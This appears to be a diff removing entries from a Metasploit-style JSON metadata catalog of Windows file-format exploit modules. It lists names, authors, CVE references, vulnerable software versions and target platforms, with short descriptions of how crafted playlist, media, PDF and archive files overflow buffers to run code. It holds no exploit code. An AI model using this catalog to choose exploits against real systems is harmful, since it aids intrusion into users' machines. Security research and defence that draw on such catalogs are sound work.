"exploit_windows/fileformat/aol_desktop_linktag": { - "name": "AOL Desktop 9.6 RTX Buffer Overflow", - "fullname": "exploit/windows/fileformat/aol_desktop_linktag", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-01-31", - "type": "exploit", - "author": [ - "sup3r", - "sickn3ss", - "sinn3r ", - "mr_me ", - "silent_dream" - ], - "description": "This module exploits a vulnerability found in AOL Desktop 9.6's Tool\\rich.rct\n component. By supplying a long string of data in the hyperlink tag, rich.rct copies\n this data into a buffer using a strcpy function, which causes an overflow, and\n results arbitrary code execution.", - "references": [ - "OSVDB-70741", - "EDB-16085" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "AOL Desktop 9.6 on Windows XP SP3", - "AOL Desktop 9.6 on Windows XP SP3 - NX bypass", - "AOL Desktop 9.6 on Windows 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/aol_desktop_linktag.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/aol_desktop_linktag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/aol_phobos_bof": { - "name": "AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow", - "fullname": "exploit/windows/fileformat/aol_phobos_bof", - "aliases": [], - "rank": 200, - "disclosure_date": "2010-01-20", - "type": "exploit", - "author": [ - "Trancer " - ], - "description": "This module exploits a stack-based buffer overflow within Phobos.dll of AOL 9.5.\n By setting an overly long value to 'Import()', an attacker can overrun a buffer\n and execute arbitrary code.\n\n NOTE: This ActiveX control is NOT marked safe for scripting or initialization.", - "references": [ - "OSVDB-61964", - "EDB-11204", - 
"URL-http://www.rec-sec.com/2010/01/25/aol-playlist-class-buffer-overflow/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/aol_phobos_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/aol_phobos_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/apple_quicktime_pnsize": { - "name": "Apple QuickTime PICT PnSize Buffer Overflow", - "fullname": "exploit/windows/fileformat/apple_quicktime_pnsize", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-08-08", - "type": "exploit", - "author": [ - "MC ", - "corelanc0d3r " - ], - "description": "This module exploits a vulnerability in Apple QuickTime Player 7.60.92.0.\n When opening a .mov file containing a specially crafted PnSize value, an attacker\n may be able to execute arbitrary code.", - "references": [ - "CVE-2011-0257", - "OSVDB-74687", - "EDB-17777", - "BID-49144" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 with DEP bypass" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/apple_quicktime_pnsize", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/apple_quicktime_rdrf": { - "name": "Apple Quicktime 7 Invalid Atom Length Buffer Overflow", - "fullname": "exploit/windows/fileformat/apple_quicktime_rdrf", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-05-22", - "type": "exploit", - 
"author": [ - "Jason Kratzer", - "Tom Gallagher", - "Paul Bates", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in Apple QuickTime. The flaw is\n triggered when QuickTime fails to properly handle the data length for certain\n atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer\n overflow by loading a specially crafted .mov file, and allows arbitrary\n code execution under the context of the current user. Please note: Since an egghunter\n is used to search for the payload, this may require additional time for\n the exploit to complete.", - "references": [ - "CVE-2013-1017", - "OSVDB-93625", - "BID-60097", - "URL-http://support.apple.com/kb/HT5770", - "ZDI-13-110" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Quicktime 7.7.0 - 7.7.3 on Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/apple_quicktime_rdrf", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/apple_quicktime_texml": { - "name": "Apple QuickTime TeXML Style Element Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/apple_quicktime_texml", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-05-15", - "type": "exploit", - "author": [ - "Alexander Gavrun", - "sinn3r ", - "juan vazquez " - ], - "description": "This module exploits a vulnerability found in Apple QuickTime. When handling\n a TeXML file, it is possible to trigger a stack-based buffer overflow, and then\n gain arbitrary code execution under the context of the user. 
This is due to the\n QuickTime3GPP.gtx component not handling certain Style subfields properly, storing\n user-supplied data on the stack, which results the overflow.", - "references": [ - "OSVDB-81934", - "CVE-2012-0663", - "BID-53571", - "ZDI-12-107", - "URL-http://0x1byte.blogspot.com/2012/06/cve-2012-0663-and-cve-2012-0664-samples.html", - "URL-http://support.apple.com/kb/HT1222" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "QuickTime 7.7.1 on Windows XP SP3", - "QuickTime 7.7.0 on Windows XP SP3", - "QuickTime 7.6.9 on Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/apple_quicktime_texml.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/apple_quicktime_texml", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/audio_coder_m3u": { - "name": "AudioCoder .M3U Buffer Overflow", - "fullname": "exploit/windows/fileformat/audio_coder_m3u", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-05-01", - "type": "exploit", - "author": [ - "metacom", - "juan vazquez " - ], - "description": "This module exploits a buffer overflow in AudioCoder 0.8.18. The vulnerability\n occurs when adding an .m3u, allowing arbitrary code execution with the privileges\n of the user running AudioCoder. 
This module has been tested successfully on\n AudioCoder 0.8.18.5353 over Windows XP SP3 and Windows 7 SP1.", - "references": [ - "CVE-2017-8870", - "OSVDB-92939", - "EDB-25141" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "AudioCoder 0.8.18.5353 / Windows XP SP3 / Windows 7 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/audio_coder_m3u.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/audio_coder_m3u", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/audio_wkstn_pls": { - "name": "Audio Workstation 6.4.2.4.3 pls Buffer Overflow", - "fullname": "exploit/windows/fileformat/audio_wkstn_pls", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-12-08", - "type": "exploit", - "author": [ - "germaya_x", - "dookie" - ], - "description": "This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3.\n When opening a malicious pls file with the Audio Workstation,\n a remote attacker could overflow a buffer and execute\n arbitrary code.", - "references": [ - "CVE-2009-0476", - "OSVDB-55424", - "EDB-10353" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/audio_wkstn_pls.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/audio_wkstn_pls", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/audiotran_pls": { - "name": "Audiotran 1.4.1 (PLS File) Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/audiotran_pls", - "aliases": [], - "rank": 400, - 
"disclosure_date": "2010-01-09", - "type": "exploit", - "author": [ - "Sebastien Duquette", - "dookie" - ], - "description": "This module exploits a stack-based buffer overflow in Audiotran 1.4.1.\n An attacker must send the file to victim and the victim must open the file.\n Alternatively it may be possible to execute code remotely via an embedded\n PLS file within a browser, when the PLS extension is registered to Audiotran.\n This functionality has not been tested in this module.", - "references": [ - "CVE-2009-0476", - "OSVDB-55424", - "EDB-11079" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/audiotran_pls.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/audiotran_pls", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/audiotran_pls_1424": { - "name": "Audiotran PLS File Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/audiotran_pls_1424", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-09-09", - "type": "exploit", - "author": [ - "Philip OKeefe" - ], - "description": "This module exploits a stack-based buffer overflow in Audiotran 1.4.2.4.\n An attacker must send the file to victim and the victim must open the file.\n Alternatively, it may be possible to execute code remotely via an embedded\n PLS file within a browser when the PLS extension is registered to Audiotran.\n This alternate vector has not been tested and cannot be exercised directly\n with this module.", - "references": [ - "EDB-14961" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - 
"path": "/modules/exploits/windows/fileformat/audiotran_pls_1424.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/audiotran_pls_1424", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/aviosoft_plf_buf": { - "name": "Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/aviosoft_plf_buf", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-11-09", - "type": "exploit", - "author": [ - "modpr0be", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in Aviosoft Digital TV Player\n Pro version 1.x. An overflow occurs when the process copies the content of a\n playlist file on to the stack, which may result arbitrary code execution under\n the context of the user.", - "references": [ - "OSVDB-77043", - "EDB-18096" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Aviosoft DTV Player 1.0.1.2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/aviosoft_plf_buf", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/bacnet_csv": { - "name": "BACnet OPC Client Buffer Overflow", - "fullname": "exploit/windows/fileformat/bacnet_csv", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-09-16", - "type": "exploit", - "author": [ - "Jeremy Brown", - "MC " - ], - "description": "This module exploits a stack buffer overflow in SCADA\n Engine BACnet OPC Client v1.0.24. 
When the BACnet OPC Client\n parses a specially crafted csv file, arbitrary code may be\n executed.", - "references": [ - "CVE-2010-4740", - "OSVDB-68096", - "BID-43289", - "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-10-264-01" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 English", - "Windows 2000 SP4 English" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/fileformat/bacnet_csv.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/bacnet_csv", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/beetel_netconfig_ini_bof": { - "name": "Beetel Connection Manager NetConfig.ini Buffer Overflow", - "fullname": "exploit/windows/fileformat/beetel_netconfig_ini_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-10-12", - "type": "exploit", - "author": [ - "metacom", - "wvu " - ], - "description": "This module exploits a stack-based buffer overflow in Beetel Connection\n Manager. 
The vulnerability exists in the parsing of the UserName\n parameter in the NetConfig.ini file.\n\n The module has been tested successfully against version\n PCW_BTLINDV1.0.0B04 on Windows XP SP3 and Windows 7 SP1.", - "references": [ - "OSVDB-98714", - "EDB-28969" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "PCW_BTLINDV1.0.0B04 (WinXP SP3, Win7 SP1)" - ], - "mod_time": "2020-02-04 10:05:41 +0000", - "path": "/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/beetel_netconfig_ini_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/blazedvd_hdtv_bof": { - "name": "BlazeVideo HDTV Player Pro v6.6 Filename Handling Vulnerability", - "fullname": "exploit/windows/fileformat/blazedvd_hdtv_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-04-03", - "type": "exploit", - "author": [ - "b33f", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in BlazeVideo HDTV Player's filename\n handling routine. When supplying a string of input data embedded in a .plf file,\n the MediaPlayerCtrl.dll component will try to extract a filename by using\n PathFindFileNameA(), and then copies whatever the return value is on the stack by\n using an inline strcpy. 
As a result, if this input data is long enough, it can cause\n a stack-based buffer overflow, which may lead to arbitrary code execution under the\n context of the user.", - "references": [ - "OSVDB-80896", - "EDB-18693", - "EDB-22931" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "BlazeVideo HDTV Player Pro v6.6.0.3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/blazedvd_hdtv_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/blazedvd_hdtv_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/blazedvd_plf": { - "name": "BlazeDVD 6.1 PLF Buffer Overflow", - "fullname": "exploit/windows/fileformat/blazedvd_plf", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-08-03", - "type": "exploit", - "author": [ - "MC ", - "Deepak Rathore", - "Spencer McIntyre", - "Ken Smith" - ], - "description": "This module exploits a stack over flow in BlazeDVD 5.1 and 6.2. 
When\n the application is used to open a specially crafted plf file,\n a buffer is overwritten allowing for the execution of arbitrary code.", - "references": [ - "CVE-2006-6199", - "EDB-32737", - "OSVDB-30770", - "BID-35918" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "BlazeDVD 6.2", - "BlazeDVD 5.1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/blazedvd_plf.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/blazedvd_plf", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "screen-effects" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/boxoft_wav_to_mp3": { - "name": "Boxoft WAV to MP3 Converter v1.1 Buffer Overflow", - "fullname": "exploit/windows/fileformat/boxoft_wav_to_mp3", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-08-31", - "type": "exploit", - "author": [ - "Robbie Corley", - "Shelby Pace" - ], - "description": "This module exploits a stack buffer overflow in Boxoft WAV to MP3 Converter versions 1.0 and 1.1.\n By constructing a specially crafted WAV file and attempting to convert it to an MP3 file in the\n application, a buffer is overwritten, which allows for running shellcode.", - "references": [ - "CVE-2015-7243", - "EDB-38035" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Boxoft WAV to MP3 Converter v1.1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/boxoft_wav_to_mp3.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/boxoft_wav_to_mp3", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - 
"exploit_windows/fileformat/bpftp_client_bps_bof": { - "name": "BulletProof FTP Client BPS Buffer Overflow", - "fullname": "exploit/windows/fileformat/bpftp_client_bps_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-07-24", - "type": "exploit", - "author": [ - "Gabor Seljan" - ], - "description": "This module exploits a stack-based buffer overflow vulnerability in\n BulletProof FTP Client 2010, caused by an overly long hostname.\n\n By persuading the victim to open a specially-crafted .BPS file, a\n remote attacker could execute arbitrary code on the system or cause\n the application to crash. This module has been tested successfully on\n Windows XP SP3.", - "references": [ - "EDB-34162", - "EDB-34540", - "EDB-35449", - "OSVDB-109547", - "CVE-2014-2973" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/bpftp_client_bps_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/bpftp_client_bps_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/bsplayer_m3u": { - "name": "BS.Player 2.57 Buffer Overflow (Unicode SEH)", - "fullname": "exploit/windows/fileformat/bsplayer_m3u", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-01-07", - "type": "exploit", - "author": [ - "C4SS!0 G0M3S", - "Chris Gabriel" - ], - "description": "This module exploits a buffer overflow in BS.Player 2.57. 
When\n the playlist import is used to import a specially crafted m3u file,\n a buffer overflow occurs allowing arbitrary code execution.", - "references": [ - "OSVDB-82528", - "EDB-15934" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP", - "Windows 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/bsplayer_m3u.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/bsplayer_m3u", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ca_cab": { - "name": "CA Antivirus Engine CAB Buffer Overflow", - "fullname": "exploit/windows/fileformat/ca_cab", - "aliases": [], - "rank": 400, - "disclosure_date": "2007-06-05", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in CA eTrust Antivirus 8.1.637.\n By creating a specially crafted CAB file, an attacker may be able\n to execute arbitrary code.", - "references": [ - "CVE-2007-2864", - "OSVDB-35245", - "BID-24330", - "ZDI-07-035" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 All / Windows XP SP0/SP1 (CA eTrust Antivirus 8.1.637)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ca_cab.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ca_cab", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/cain_abel_4918_rdp": { - "name": "Cain and Abel RDP Buffer Overflow", - "fullname": "exploit/windows/fileformat/cain_abel_4918_rdp", - "aliases": [], - "rank": 400, - "disclosure_date": "2008-11-30", - "type": "exploit", - 
"author": [ - "Trancek " - ], - "description": "This module exploits a stack-based buffer overflow in the Cain & Abel v4.9.24\n and below. An attacker must send the file to victim, and the victim must open\n the specially crafted RDP file under Tools -> Remote Desktop Password Decoder.", - "references": [ - "CVE-2008-5405", - "OSVDB-50342", - "EDB-7329", - "BID-32543" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP2 English", - "Windows XP SP0/1 English", - "Windows XP SP2 Spanish" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/cain_abel_4918_rdp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ccmplayer_m3u_bof": { - "name": "CCMPlayer 1.5 m3u Playlist Stack Based Buffer Overflow", - "fullname": "exploit/windows/fileformat/ccmplayer_m3u_bof", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-11-30", - "type": "exploit", - "author": [ - "Rh0" - ], - "description": "This module exploits a stack based buffer overflow in CCMPlayer 1.5. Opening\n a m3u playlist with a long track name, a SEH exception record can be overwritten\n with parts of the controllable buffer. 
SEH execution is triggered after an\n invalid read of an injectable address, thus allowing arbitrary code execution.\n This module works on multiple Windows platforms including: Windows XP SP3,\n Windows Vista, and Windows 7.", - "references": [ - "CVE-2011-5170", - "OSVDB-77453", - "EDB-18178" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "CCMPlayer 1.5" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ccmplayer_m3u_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/chasys_draw_ies_bmp_bof": { - "name": "Chasys Draw IES Buffer Overflow", - "fullname": "exploit/windows/fileformat/chasys_draw_ies_bmp_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-07-26", - "type": "exploit", - "author": [ - "Christopher Gabriel", - "Longinos Recuero Bustos", - "Javier 'soez'", - "juan vazquez " - ], - "description": "This module exploits a buffer overflow vulnerability found in Chasys Draw IES\n (version 4.10.01). The vulnerability exists in the module flt_BMP.dll, while\n parsing BMP files, where the ReadFile function is used to store user provided data\n on the stack in an insecure way. It results in arbitrary code execution under the\n context of the user viewing a specially crafted BMP file. 
This module has been\n tested successfully with Chasys Draw IES 4.10.01 on Windows XP SP3 and Windows 7\n SP1.", - "references": [ - "CVE-2013-3928", - "OSVDB-95689", - "BID-61463", - "URL-http://web.archive.org/web/20140326093457/http://secunia.com/advisories/53773/", - "URL-http://longinox.blogspot.com/2013/08/explot-stack-based-overflow-bypassing.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Chasys Draw IES 4.10.01 / Windows XP SP3 / Windows 7 SP1" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/chasys_draw_ies_bmp_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/coolpdf_image_stream_bof": { - "name": "Cool PDF Image Stream Buffer Overflow", - "fullname": "exploit/windows/fileformat/coolpdf_image_stream_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-01-18", - "type": "exploit", - "author": [ - "Francis Provencher", - "Chris Gabriel", - "juan vazquez " - ], - "description": "This module exploits a stack buffer overflow in Cool PDF Reader prior to version\n 3.0.2.256. The vulnerability is triggered when opening a malformed PDF file that\n contains a specially crafted image stream. 
This module has been tested successfully\n on Cool PDF 3.0.2.256 over Windows XP SP3 and Windows 7 SP1.", - "references": [ - "CVE-2012-4914", - "OSVDB-89349", - "EDB-24463", - "URL-http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=70&Itemid=70" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Cool PDF 3.0.2.256 / Windows 7 SP1 / Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/coolpdf_image_stream_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/coolpdf_image_stream_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/corelpdf_fusion_bof": { - "name": "Corel PDF Fusion Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/corelpdf_fusion_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-07-08", - "type": "exploit", - "author": [ - "Kaveh Ghaemmaghami", - "juan vazquez " - ], - "description": "This module exploits a stack-based buffer overflow vulnerability in version 1.11 of\n Corel PDF Fusion. The vulnerability exists while handling a XPS file with long entry\n names. In order for the payload to be executed, an attacker must convince the target\n user to open a specially crafted XPS file with Corel PDF Fusion. 
By doing so, the\n attacker can execute arbitrary code as the target user.", - "references": [ - "CVE-2013-3248", - "OSVDB-94933", - "BID-61010", - "URL-http://web.archive.org/web/20130720043800/http://secunia.com:80/advisories/52707/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Corel PDF Fusion 1.11 / Windows XP SP3" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/fileformat/corelpdf_fusion_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/corelpdf_fusion_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/csound_getnum_bof": { - "name": "Csound hetro File Handling Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/csound_getnum_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-02-23", - "type": "exploit", - "author": [ - "Secunia", - "juan vazquez " - ], - "description": "This module exploits a buffer overflow in Csound before 5.16.6.\n The overflow occurs when trying to import a malicious hetro file\n from tabular format.\n In order to achieve exploitation the user should import the malicious\n file through csound with a command like \"csound -U het_import msf.csd file.het\".\n This exploit doesn't work if the \"het_import\" command is used directly\n to convert the file.", - "references": [ - "CVE-2012-0270", - "OSVDB-79491", - "BID-52144", - "URL-http://web.archive.org/web/20120514124556/http://secunia.com/secunia_research/2012-3/", - "URL-http://csound.git.sourceforge.net/git/gitweb.cgi?p=csound/csound5.git;a=commit;h=7d617a9551fb6c552ba16874b71266fcd90f3a6f" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Csound 5.15 / Windows XP SP3 / Windows 7 SP1" - ], - "mod_time": 
"2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/fileformat/csound_getnum_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/csound_getnum_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/cutezip_bof": { - "name": "GlobalSCAPE CuteZIP Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/cutezip_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-02-12", - "type": "exploit", - "author": [ - "C4SS!0 G0M3S ", - "juan vazquez " - ], - "description": "This module exploits a stack-based buffer overflow vulnerability in version 2.1\n of CuteZIP.\n\n In order for the command to be executed, an attacker must convince the target user\n to open a specially crafted zip file with CuteZIP. By doing so, an attacker can\n execute arbitrary code as the target user.", - "references": [ - "OSVDB-85709", - "EDB-16162", - "BID-46375" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "CuteZIP 2.1 / Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/cutezip_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/cutezip_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/cve_2017_8464_lnk_rce": { - "name": "LNK Code Execution Vulnerability", - "fullname": "exploit/windows/fileformat/cve_2017_8464_lnk_rce", - "aliases": [], - "rank": 500, - "disclosure_date": "2017-06-13", - "type": "exploit", - "author": [ - "Uncredited", - "Yorick Koster", - "Spencer McIntyre" - ], - "description": "This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)\n that contain a dynamic icon, loaded from a 
